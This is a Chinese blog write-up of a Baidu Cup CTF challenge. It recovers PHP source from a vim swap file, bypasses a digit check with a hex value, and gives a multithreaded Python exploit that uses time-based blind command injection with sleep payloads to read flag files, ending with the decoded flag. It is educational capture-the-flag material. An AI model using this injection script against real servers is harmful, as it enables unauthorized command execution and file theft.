百度杯CTF比赛 十月场-EXEC

最新推荐文章于 2024-05-16 14:19:20 发布
最新推荐文章于 2024-05-16 14:19:20 发布
阅读量1.6k 收藏 3
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kostart123/article/details/81223161
版权

前言

这道题本来要用bash反弹shell的技术的,但是由于没有公网ip的服务器,我就用了命令盲注的方法,特此记录一下。

分析

打开链接题目提示no sign。查看源代码发现这一行

<meta language='utf-8' editor='vim'>

于是就想到了vim信息泄露,于是访问.index.php.swp成功下载了源代码

<html>
<head>
<title>blind cmd exec</title>
<meta language='utf-8' editor='vim'>
</head>
</body>
<img src=pic.gif>
<?php
/*
flag in flag233.php
*/
 function check($number)
{
        $one = ord('1');
        $nine = ord('9');
        for ($i = 0; $i < strlen($number); $i++)
        {   
                $digit = ord($number{$i});
                if ( ($digit >= $one) && ($digit <= $nine) )
                {
                        return false;
                }
        }
           return $number == '11259375';
}
if(isset($_GET[sign])&& check($_GET[sign])){
    setcookie('auth','tcp tunnel is forbidden!');
    if(isset($_POST['cmd'])){
        $command=$_POST[cmd];
        $result=exec($command);
        //echo $result;
    }
}else{
    die('no sign');
}
?>
</body>
</html>

分析源码,发现可以执行命令,但是没有回显。最先想到的就是bash反弹shell来执行命令,此外题目提示tcp tunnel is forbidden!,就只能反弹到udp的端口了。但是我没有公网ip的服务器咋办啊,于是联想到以前做过的sql盲注这次我来个命令盲注。
页面没有回显,就只能做基于时间的盲注了,脚本总的来说很简单,使用了多线程,下面贴出exp

import requests,string,threading

def getLength(url,payload):
    data = {}
    length = 0
    for i in xrange(200):
        data['cmd']="a=$(%s);b=${#a};if test $b -eq %d;then sleep 3;fi"%(payload,i)
        try:
            r = requests.post(url,data=data,timeout=3)
        except:
            length = i
            print "the string length is {}".format(length)
            break
    return length

def getString(url,payload):
    global length,lock,curId,key
    data = {}
    words = string.uppercase+string.lowercase+string.digits+'/=+'
    i = 0
    while True:
        lock.acquire()
        if curId == length:
            lock.release()
            break
        i = curId
        curId += 1
        lock.release()
        for j in words:
            data['cmd']="a=$({});b=`expr substr $a {} 1`;if test $b = '{}';then sleep 8;fi".format(payload,i+1,j)
            try:
                r = requests.post(url,data=data,timeout=8)
            except:
                key[i] = j
                lock.acquire()
                print ''.join(key)
                lock.release()
                break


url = 'http://708ff2d40f1d48a5bef9408daed3fa0665c6180098394883.game.ichunqiu.com/?sign=0xabcdef'
payload = "base64 flag233.php -w 0" 
length = getLength(url,payload)
lock = threading.Lock()
curId = 0 #max(curId) = length - 1
key = ['?' for i in xrange(length)]

th=[]
for i in xrange(10):
    t = threading.Thread(target=getString,args=(url,payload))
    th.append(t)
for t in th:
    t.start()  
for t in th:
    t.join()

需要注意的是,题目使用的shell是shdashbash的区别看这个),所以在字串截取时不能使用bash${a:1:1}的方式。还有就是在使用expr substr进行子串截取时目标字符串需要是单行的否则会出错,可以配合headtail命令一行一行读取。这里我使用了base64命令将命令结果编码,防止换行或特殊字符干扰。注意要使用base64 -w 0关闭换行。
最后运行代码获得flag

root@kali:~# echo PD9waHAKCSRmbGFnPSdmbGFne2ExMWM4MjI3LWMyNGItNDAyNC1hMDRhLTdiOGIxOTYxZGM1ZH0nOwo/PgpoaGhoaGhoaGhoaCx0b28geW91bmcgdG9vIHNpbXBsZQo= | base64 -d
<?php
    $flag='flag{a11c8227-c24b-4024-a04a-7b8b1961dc5d}';
?>
hhhhhhhhhhh,too young too simple
root@kali:~#

还需要注意的是,由于题目平台资源限制,使用多线程会导致平台反应过慢从而导致盲注的正确性降低。可以通过减少线程或是增大sleep的时间来增加正确率。

总结

算是另辟蹊径了,而且在写代码的时候学到了很多。原来不熟悉,不理解的命令用法更清楚了。但是还要注意的是,时间盲注在注入时间较长时就容易造成误差,有的字节会出错,反正再有别的解决方法时时间盲注不是优先选择的方法。

r00tnb
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
网络安全web 信息泄露小概
qq_42812036的博客
03-10 1205
本文包含web安全以及ctf中出现过的三类信息泄露,讲述使用python脚本进行clone时要注意的点,和readme.md里没出现但可以有的一些进阶一点的操作。 一、svn源码泄露 当开发人员使用 SVN 进行版本控制,对站点自动部署。如果配置不当,可能会将.svn文件夹直接部署到线上环境。这就引起了 SVN 泄露漏洞。 版本控制工具:dvcs-ripper https://git...
2023最全CTF入门指南(建议收藏,文章末尾有福利)
顶峰
09-22 413
2023CTF入门指南
[原题复现]百度CTF比赛 十月 WEB EXEC(PHP弱类型)
笑花大王
03-12 666
简介 原题复现: 考察知识点:PHP弱类型、 线上平台:https://www.ichunqiu.com/battalion(i春秋 CTF平台) 过程 看源码发现这个 vim泄露 下方都试了一遍 。index.php.swp是的 下载源码即可 .index.php.swpindex.php.swp ——vim文件泄露index.php.bakindex.php~ 要通过...
Buuctf-Web-[ACTF2020 新生赛]Exec 题解&amp;思路总结_actf新生赛(2)
最新发布
2401_84968060的博客
05-16 254
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
i春秋 “百度CTF比赛 十月 Exec
include_heqile的博客
10-08 1090
https://www.ichunqiu.com/battalion?t=1&amp;amp;amp;r=0 进入题目链接,是一只猫咪 查看网页源代码: &amp;amp;lt;html&amp;amp;gt; &amp;amp;lt;head&amp;amp;gt; &amp;amp;lt;title&amp;amp;gt;blind cmd exec&amp;amp;lt;/title&amp;amp;gt; &
百度CTF比赛 十月 Login
whisper_ZH的博客
09-23 321
进入题目首先看到 先来盲猜一波密码,发现除了error 别的啥也没 F12看看有没有啥玩意 盲猜用户名和密码 登陆一波~~ 尼玛啥都没! 扫个后台看看又没啥东西 还啥都没!!! 一点头绪都没,抓个包看看~~ 改show值为1 代码如下 <?php include 'common.php'; $requset = array_merge($_GET, $_POS...
CTF比赛编码工具Captfencoder-1.3.0
09-21
CaptfEncoder是一款跨平台网络安全工具套件,提供网络安全相关编码转换、古典密码、密码学、...Ascii Encoding Web Encoding Hex Encoding Unicode Encoding Base64(Base16、Base32、Base58) ...Tap Code(敲击码)
百度CTF比赛二月第三比赛(Reverse专题赛)的CrackMe-1题目
03-30
百度CTF比赛二月第三比赛(Reverse专题赛)的CrackMe-1题目。
CTF 竞赛入门指南(ctf-all-in-one).pdf
09-07
一、基础篇;二、工具篇;三、分类专题篇;四、技巧篇;五、高级篇;六、题解篇;七、实战篇... 2000多页的电子书,讲解细致,值得搜藏。
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
内容概要: CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息... 使用景: ... 其他说明: ...
CTF比赛中的常见题型-适合初学者
08-17
CTF比赛中的常见题型--适合初学者
百度CTF比赛 十月GetFlag
大方子
08-22 2121
  ========================== 个人收获: 1.不要怕,多尝试 2.知道Linux web网站的默认路径 /var/www/html 3.里面有个小疑问为什么flag后面要加; (因为eval中要执行的代码也必须是完整的PHP代码,PHP是以  ;  作为一个语句的结束符的)找到的答案   ==========================   题目...
百度CTF比赛 十月EXEC
weixin_34248849的博客
04-02 178
前面比较常规吧看源代码-看到vim 然后就是 .index.php.swp 然后就是 这个文件的恢复,用linux下vim -r index.php.swp 就可以看到不是乱码的文件了 然后就是审核源码 1.用了ord()[返回第一个的acsii编码] 函数 大概条件的条件就是 不能是数字 2.用16进制的就可以绕过了0xabcdef == '11259375' 条件为真 然后主要...
i春秋 “百度CTF比赛 十月 登陆
include_heqile的博客
10-11 2532
https://www.ichunqiu.com/battalion?t=1&amp;r=0 进入题目链接,是一个登陆框 尝试admin' or 1=1#,密码随便输,返回页面密码错误 再尝试用户名随便输,密码随便输,返回页面用户名不存在 确定为bool盲注 使用python脚本执行盲注: #-*- coding:utf-8 -*- from urllib.request import urlop...
百度CTF比赛 十月 writeup
Senimo
08-17 3358
百度CTF比赛 十月 writeupMisc签到题那些年我追过的贝丝我要变成一只程序员剧情大反转challenge传说中的签到题听说是rc4算法try again表姐家的签到题泄露的数据考眼力flag格式WebLoginBackdoorGetFlagNot FoundVldEXEC登录GiftfuzzingTryHashNothing Misc 签到题 **分值:10分 题目内容: 对百度...
百度十一月第一周 PWN loading 详解
aptx4869_li的博客
06-11 1204
PWN-loading-wp0x0001用IDA查看发现只有一个关键函数:首先,了解一下 mmap 函数是干什么的:推荐一个网址:https://www.cnblogs.com/huxiao-tee/p/4660352.html
[百度] 十月 登陆 writeup
Flyour的博客
04-17 1911
c26老哥的视频教程十分的详细了,这里我主要说一下自己在这道题里踩到的坑,避免下次再犯。 视频链接: http://www.ichunqiu.com/ourse/56093 1 、登陆步骤 先试一了以下万能密码 admin’ or ‘1’=’1 发现有两种报错响应,“用户名不存在”和“密码错误”,明显的是布尔值盲注。很开心,哪脚本跑一下,发现mid, substr, left ,sear...
百度CTF比赛 十月 签到题
Break-attack的博客
01-07 1024
百度CTF比赛 十月 签到题 题目内容: 对百度用时下最流行的表白 (去调戏i春秋公众号) 大声说出你的爱!!! 这我真的解不出来...看了别人的结题思路原来是要回复:百度么么哒 (0.0 这我真的猜不到),回复后得到flag。 flag:flag{baIdU_8ei_meme_D0} 总结:有的时候签到...
百度CTF Write up集锦 WEB篇
热门推荐
4ct10n
09-21 4万+
九月1.code一开始的URL为http://ace3c302efed4a9094cbac1dff0250e8add1b4b45f8249d4.game.ichunqiu.com/index.php?jpg=hei.jpg尝试着令jpg=index.php得出了base64编码的文本 丢到解码器里解出文本index.php<?php /** * Created by PhpStorm. *
福建闽盾 ctf比赛题目
08-26
福建闽盾CTF比赛题目是指“福建”和“闽盾”这两个关键词所组成的CTF比赛的题目。CTF(Capture The Flag,夺旗赛)是一种网络安全竞赛,旨在考验选手在网络攻防和信息安全方面的技能。 福建作为一个华南沿海省份,具有独特的地理、人文和历史背景。以此为题目,可以设计与福建相关的题目,如“福建的历史文化”、“福建的名胜古迹”、“福建特色美食”等等。选手在解答题目过程中,需要了解福建的相关知识,并运用自己的搜索、分析和解决问题的能力,最终找到答案。 而“闽盾”是指福建省网络安全协会举办的一项CTF比赛。我无法提供具体的题目,因为每届比赛的题目都不同,涵盖的领域也各有不同。根据以往比赛的经验,题目的类型可以包括密码学、网站漏洞、二进制安全、逆向工程、隐写术等等。选手需要在限定时间内根据提示或已给出的信息,分析、解决问题并提交答案。 CTF比赛旨在提高选手的网络安全技能、加深对信息安全的理解和运用,并且培养团队合作和应急响应的能力。福建闽盾作为一项有影响力的CTF比赛,吸引了许多对网络安全感兴趣的人士参与。参赛者可以通过参加该比赛,不断学习、提升自己的技术水平,同时也为网络安全事业贡献力量。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值